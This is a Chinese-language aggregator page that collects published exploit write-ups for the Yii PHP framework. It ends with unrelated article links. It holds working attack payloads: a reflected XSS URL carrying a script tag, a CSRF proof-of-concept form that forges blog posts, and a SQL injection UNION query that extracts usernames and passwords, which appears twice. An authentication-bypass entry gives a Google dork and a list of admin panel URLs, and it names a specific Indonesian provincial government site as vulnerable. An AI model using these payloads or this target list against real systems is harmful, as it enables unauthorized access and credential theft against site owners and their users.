一 Yii Framework 2.0.9 - Cross Site ScriptingPublished

# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting
# Discovery Date: 2019-02-12
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.yiiframework.com/
# Version: 2.0.9
# CVE : 2018-6010 In Yii Framework 2.x before 2.0.14, an reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php. Example: http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E

  

二 Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability

#################################################################################################

# Exploit Title : Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/07/2018
# Vendor Homepage : yiiframework.com
# Tested On : Windows
# Software Download and Installation Links : packagist.org/packages/mdmsoft/yii2-admin ~
github.com/yii2mod/yii2-rbac ~ github.com/mdmsoft/yii2-admin
+ yiiframework.com/extension/rbac-manager ~ yiiframework.com/extension/yii2-admin ~
+ travis-ci.org/mdmsoft/yii2-admin ~ scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master
+ codeclimate.com/github/mdmsoft/yii2-admin
# Category : WebApps
# Versions : 2.x and 3.x
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ] ################################################################################################# # Another Title : Powered by Yii Framework PHP Web Application Development Improper Authentication Vulnerability Yii Framework yii2-admin RBAC Manager for Yii 2 GUI manager for RABC (Role Base Access Control) Yii2. Easy to manage authorization of user Features of the Product [ Software ] Manage RBAC System in intuitive Tree-View
Ceep cool with rekursion protection in RBAC Tree
Generate PHP Code
Full relational move, create, edit, delete support of RBAC Tree items.
Assign and eject multiple Roles to and from multiple Users
Create predefined buisness Rules for User Assignments
Assign Roles in Secure Mode
By Controller protected and not changeable Roles and Assignments
Use easy checkAccess() methods in your Controller
Create easy bizRule Code in your RBAC Roles and Assignments ################################################################################################ # Description for Improper Authentication Vulnerability [ CWE-287 ] + When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. + If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering
(e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges
within the application or disclose sensitive information. + If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page: + If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page. + Powered by Yii Framework RBAC Manager for Yii 2 vulnerability results from software misconfiguration. + The attacker might be able to gain unauthorized access to the application and otherwise
restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code. + An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks. Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org] ################################################################################################# # Google Dork : inurl:''/emusrenbang/web/index.php?r='' # Administration Login Panel => /emusrenbang/web/index.php?r=site%2Flogin # Exploit : No Username. No Password. No Need for Login Credentials. Web don't need login. Just enter this link after URL Link. /emusrenbang/web/index.php?r=admin Whatever you give an exploit like [ anything' OR 'x'='x ] or [ '=''or' ] and many others as SQL Authentication Bypass. It always says that '' Incorrect username or password. '' But we will jump over the admindoor wall. This is called as Improper Authentication Vulnerability. 127.0.0.1/emusrenbang/web/index.php?r=site%2Flogin => [ Proof of Concept ] => archive.is/BLaE5 127.0.0.1/emusrenbang/web/index.php?r=admin => [ Proof of Concept ] => archive.is/D9dKP Useable Admin Control Panel URL Links => /emusrenbang/web/index.php?r=admin
/emusrenbang/web/index.php?r=admin%2Fassignment
/emusrenbang/web/index.php?r=admin%2Frole
/emusrenbang/web/index.php?r=admin%2Fpermission
/emusrenbang/web/index.php?r=admin%2Froute
/emusrenbang/web/index.php?r=admin%2Frule
/emusrenbang/web/index.php?r=admin%2Fmenu
/emusrenbang/web/index.php?r=admin%2Fdefault%2Findex ################################################################################################# Indonesia Government Site [ Bappeda Provinsi Sumatera Utara 2016 ] is only vulnerable website. # Example Site => eplanning.sumutprov.go.id/emusrenbang/web/index.php?r=admin%2Fmenu # [ Proof of Concept ] => archive.is/lCRem ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

  

三 Yii Framework Blog Cross Site Request Forgery

# Exploit Title: Yii Framework Blog Application CSRF Vulnerability
# Date: 3 Mar 2014
# Author: Christy Philip Mathew
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/
# Category:: web
# Tested on: Windows 8 Attacker will be able to create a post. <html> <body>
<form action="
http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">
<input type="hidden" name="Post[title]" value="test" />
<input type="hidden" name="Post[content]" value="test" />
<input type="hidden" name="Post[tags]" value="test" />
<input type="hidden" name="Post[status]" value="2" />
<input type="hidden" name="yt0" value="Create" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

  

四 Yii Framework Search SQL Injection Vulnerability

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
####
Vulnerability:
################################## SQL Injection via search form. You can query to get some info about
administrator account and something... ##################################
Exploitation:
################################## ' UNION SELECT
1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
fRom user-- - ##################################
More Details:
################################## Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html ##################################
Great thanks to Juno_okyo and James - J2TeaM
##################################

  

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
####
Vulnerability:
################################## SQL Injection via search form. You can query to get some info about
administrator account and something... ##################################
Exploitation:
################################## ' UNION SELECT
1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
fRom user-- - ##################################
More Details:
################################## Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html ##################################
Great thanks to Juno_okyo and James - J2TeaM
##################################

Yii Framework 漏洞整理的更多相关文章

  1. Yii框架(Yii Framework)部署

    一.下载Yii 在部署yii框架之前首先要搭建好php环境,这里就不说搭建环境的问题了(这里已经部署好wampserver了),环境搭建好后,到yii官方网站下载yii framework:http: ...

  2. 拓展Yii Framework(易框架)

    1.拓展yii 此文针对Yii1.1.15而写,请注意甄别你的Yii Framework 版本. 拓展yii是开发期间常见的代码处理方式.例如,你写一个新的controller(业务控制器),你通过继 ...

  3. YII Framework学习教程-YII的异常处理

    异常无处不在,作为程序员,活着就是为了创造这些异常,然后修复这些异常而存在的.YII框架封装了PHP的异常,让异常处理起来更简单. 使用 YII处理错误和异常的配置方法: 你可以在入口文件中定义YII ...

  4. Yii Framework 开发教程Zii组件-Tabs示例

    有关Yii Tab类: http://www.yiichina.com/api/CTabView http://www.yiichina.com/api/CJuiTabs http://blog.cs ...

  5. Yii framework 应用总结小窍门(转)

    1. Yii Framework] 如何获取当前controller的名称? 下面语句就可以获取当前控制器的名称了! Yii::app()->controller->id 2. yii 如 ...

  6. YII Framework学习教程-YII的Model-开发规范-路径别名-命名空间

    到这里,大概的YII开发已经基本可以,但是下面要将的所有课程,学完之后可以让你更爱YII.下面的教程是讲的MVC的M,model.数据,业务,代码的集中地区.所以开始之前,学学开发规范-路径别名-命名 ...

  7. Yii Framework隐藏index.php文件的步骤

    Yii Framework隐藏index.php文件的步骤 作者:feebas 发布于:2012-4-23 13:36 Monday 分类:Yii Framework 1.开启apache的mod_r ...

  8. PHP框架 Yii framework 用yiic命令时提示“php.exe”不是内部或外部命令

    解决方案 yii/framework/yiic.bat,修改 if "%PHP_COMMAND%" == "" set PHP_COMMAND=php.exei ...

  9. Yii框架的学习指南(策码秀才篇)1-1 如何认识Yii framework

    Yii的框架和其他框架的区别在于:它是更加 快速,安全,专业的PHP框架 Yii是一个高性能的,适用于开发WEB2.0应用的PHP框架. Yii是一个基于组件.用于开发大型 Web 应用的 高性能 P ...

随机推荐

  1. sqlserver2005定期备份和清除

    1.打开管理->维护计划 2.右键点击新建维护计划 3.给新的维护计划自定义命名 4.可以看左下角的维护方式 5.拖动“备份数据库”到右边 6.选中,编辑备份方式 7.选择备份方式,所有数据库, ...

  2. Codeforces Round #632 (Div. 2)

    Codeforces Round #632 (Div. 2) 这一场打的好差呀,这几次艰难上的分全部掉回去了,感觉就像一夜回到了解放前. 说实话,就是被B卡到了,没看到只能从小的放到大的... Lit ...

  3. N - Subpalindromes URAL - 1989 哈希+线段树

    N - Subpalindromes URAL - 1989 这个是一个哈希+线段树,这个题目也不算特别难,但是呢,还比较有意思. 这个题目给你两个操作,一个是回答l~r 区间是不是回文,一个是对一个 ...

  4. 认识mysql3个基本库

    一.3个基本库 数据库初始化安装完毕会有三个基本库mysql .information_schema.performace_schema.作为应用程序开发者,平时较少关注这些数据库尤其是后两者.但是通 ...

  5. 海外网站如何通过代理IP进行采集?

    海外网站如何通过代理IP进行采集? 我们在做爬虫的时候,经常会遇到这种情况,爬虫最初运行的时候,数据是可以正常获取的,一切看起来都那么的美好,然而,不一会儿,就可能会出现403 Forbidden , ...

  6. Linux文件系统基本结构

    (1)Linux文件系统为一个倒转的单根树状结构: (2)文件系统的根为“/”: (3)文件系统严格区分大小写: (4)路径使用“/”分割(windows使用“\”): 当前工作目录 (1)每个she ...

  7. java1.8新特性之stream

    什么是Stream? Stream字面意思是流,在java中是指一个来自数据源的元素队列并支持聚合操作,存在于java.util包中,又或者说是能应用在一组元素上一次执行的操作序列.(stream是一 ...

  8. STM32 TIM高级定时器死区时间的计算

    STM32 TIM高级定时器的互补PWM支持插入死区时间,本文将介绍如何计算以及配置正确的死区时间. 文章目录 什么是死区时间? 数据手册的参数 如何计算合理的死区时间? STM32中配置死区时间 什 ...

  9. JDBC14 ORM03 JavaBean封装

    Javabean对象封装一条信息(推荐) 让JavaBean的属性名和类型尽量和数据库保持一致 一条记录对应一个对象,将这些查询到的对象放到容器中(List) 表信息如下 List封装多条信息 Con ...

  10. 曾开源OpenStack,如今Rackspace再次启动IPO

    导读:Rackspace开源的OpenStack已成为全球仅次于Linux的第二大开源社区,但Rackspace至今仍在苦苦探索路在何方. 近期有国外媒体爆料,美国云计算厂商Rackspace又悄悄准 ...